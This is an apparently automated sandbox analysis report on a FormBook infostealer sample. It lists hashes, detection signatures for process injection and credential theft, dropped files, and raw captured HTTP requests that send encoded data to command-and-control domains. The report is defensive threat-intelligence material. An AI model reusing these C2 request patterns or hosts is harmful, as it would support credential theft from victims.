# Analysis Report Mqbmupv_Signed_.exe

## Overview

### General Information

 Sample Name: Mqbmupv_Signed_.exe Analysis ID: 288093 MD5: 20a3b044b6d1b39051e35269e6590c0b SHA1: bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6 SHA256: 2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9 Tags: exe Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### AV Detection:

 Multi AV Scanner detection for dropped file
 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Virustotal: Detection: 27% Perma Link Source: C:\Users\user\AppData\Local\Mqbmnet.exe ReversingLabs: Detection: 45%
 Multi AV Scanner detection for submitted file
 Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27% Perma Link Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Yara detected FormBook
 Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file
 Source: 29.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 9.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Contains functionality to enumerate / list files inside a directory

### Software Vulnerabilities:

 Found inlined nop instructions (likely shell or obfuscated code)
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop esi 9_2_00417274 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi 9_2_00416BCD Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi 9_2_00417CA7

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
 HTTP GET or POST without a user agent
 Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware
 Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16 Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
 Internet Provider seen in connection with other malware
 Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
 JA3 SSL client fingerprint seen in connection with other malware
 Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
 Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA). Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A). Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 30 6f 76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
 Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
 Posts data to webserver
 Source: unknown HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
 Urls found in memory or binary data
 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
 Uses HTTPS
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741 Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724 Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443

### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware
 Malicious sample detected (through community Yara rule)
